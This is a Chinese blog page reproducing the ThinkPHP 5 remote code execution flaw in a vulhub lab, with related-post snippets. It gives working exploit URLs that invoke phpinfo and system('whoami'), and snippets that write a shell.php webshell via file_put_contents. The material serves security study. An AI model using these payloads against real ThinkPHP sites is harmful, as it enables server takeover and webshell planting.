Thinkphp 5-rce 漏洞复现（vulhub）

最新推荐文章于 2024-09-07 12:47:12 发布

MDSEC

最新推荐文章于 2024-09-07 12:47:12 发布

阅读量387

点赞数 1

CC 4.0 BY-SA版权

分类专栏： vulhub漏洞复现文章标签：安全

本文链接：https://blog.csdn.net/MDSEC/article/details/132398086

文章讲述了ThinkPHP5中的控制器名处理问题，导致在默认情况下可执行任意方法，引发现远程命令执行漏洞。详细描述了复现漏洞的过程，包括使用phpinfo和file_put_contents等函数进行攻击。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞原因：

ThinkPHP其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞

复现过程：

1.在虚拟机中拉去thinkphp 5-rce镜像

2.访问本机地址

输出关于php的配置信息

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

执行命令 whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

MDSEC

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2779

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

Thinkphp 2-rce 漏洞复现（vulhub）

MDSEC的博客

08-20

384

首先，你需要在本地或虚拟机上搭建一个运行Vulhub的环境。你可以从Vulhub的GitHub仓库中下载并安装Docker和docker-compose工具，然后克隆对应的ThinkPHP 2漏洞利用环境。在浏览器中，你将看到一个简单的ThinkPHP应用程序。根据漏洞描述，你需要在URL中添加参数来触发漏洞。如果成功利用漏洞，你将在浏览器中看到返回的结果，例如当前用户的信息。将上述URL参数添加到应用程序的URL后面，然后按回车键执行请求。进入ThinkPHP 2漏洞利用环境所在的目录，打开。

1 条评论您还未登录，请先登录后发表或查看评论

vuhub thinkphp-5-rce漏洞复现

qq_46804551的博客

04-24

666

搭建 your-ip:8080 搭建成功漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中，由于框架错误地处理了控制器名称，因此如果网站未启用强制路由（默认设置），则该框架可以执行任何方法，从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

thinkphp5 RCE漏洞复现

feng的博客

03-03

3760

前言之前看的是tp3的SQL注入，现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE，毕竟thinkphp最广为人知的漏洞就是RCE。首先是源码的下载，我从这里下载： thinkphp下载这里我下载的是thinkphp5.0.22完整版，如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样，RCE的执行点也都是重要的request类。关键在于这个filterValue()函数： /** * 递归过滤给定的值 * @param mixe

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

鱼溯的博客

02-02

2389

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

vulhub-thinkphp漏洞复现

qq_51922767的博客

09-14

2881

vulhub-thinkphp漏洞复现

ThinkPHP V5的RCE（远程代码执行漏洞）

Home to come

04-18

2231

一、Shell脚本基础知识 1.Shell 输入/输出重定向常见重定向符号： 1)标准输出 > 覆盖重定向 set -C 关闭覆盖重定向的功能 set +C：恢复 >| 强制重定向 >> 追加重定向 2)标准输入 < a<b :把b交给a执行 tr 替换文件内容（tr set1 [set2]）char(字符：一个...

【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

热门推荐

精品博客,你值得一看~

08-06

1万+

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。（3）还可以将php代码写入文件, 此处我们写一个phpinfo。（1）在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。（4）查看shell.php内容。直接访问 ip+端口。

Think PHP 5 RCE漏洞复现及排查

dayouzi的博客

08-11

2810

ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。

【vulhub靶场之thinkphp】——（5-rce）

weixin_57240513的博客

08-07

672

docker-compose ps//查看开启的端口。

Thinkphp5~6多语言文件包含到rce漏洞复现and详细分析解析

君逍遥o

09-08

2125

Thinkphp5~6多语言文件包含到rce漏洞复现and详细分析解析

Thinkphp 5-RCE漏洞复现

Tender*的博客

08-10

1166

ThinkPHP5披露最多得漏洞就是RCE，其中的影响版本范围非常广漏洞原理其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。影响版本不同版本 payload 不同，且5.13版本后还与debug模式有关漏洞复现进入。

vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)

weixin_43071873的博客

11-24

1802

Thinkphp 2.x 任意代码执行漏洞详情： ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po

Thinkphp5 RCE漏洞

Sentiment的博客

05-21

7654

影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同，且5.13版本后还与debug模式有关这里跟着feng师傅复现的，所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了，开启debug模式后payload一直没打通，后来发现改成其他版本的配置文件了.........

thinkphp5.*远程命令执行漏洞复现

weixin_42075643的博客

01-27

689

ThinkPHP5漏洞复现：测试版本：ThinkPHP_full_v5.0.22 远程执行命令漏洞：首先工具检测漏洞是否存在：远程执行命令，wireshark抓包：直接得到poc： http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令] 用B

thinkphp5远程代码执行漏洞分析(一)

weixin_30482383的博客

08-28

680

payload 测试版本thinkphp5.1beta url =>http://127.0.0.1/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 漏洞...

ThinkPHP5--rce远程代码执行

m0_74402888的博客

04-30

1397

在ThinkPHP5版本中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

thinkphp2-rce

07-28

ThinkPHP 2.x版本中存在远程代码执行（RCE）漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说，漏洞出现在ThinkPHP框架中的路由处理函数中，使用了不安全的preg_replace函数，并且使用了/e模式进行...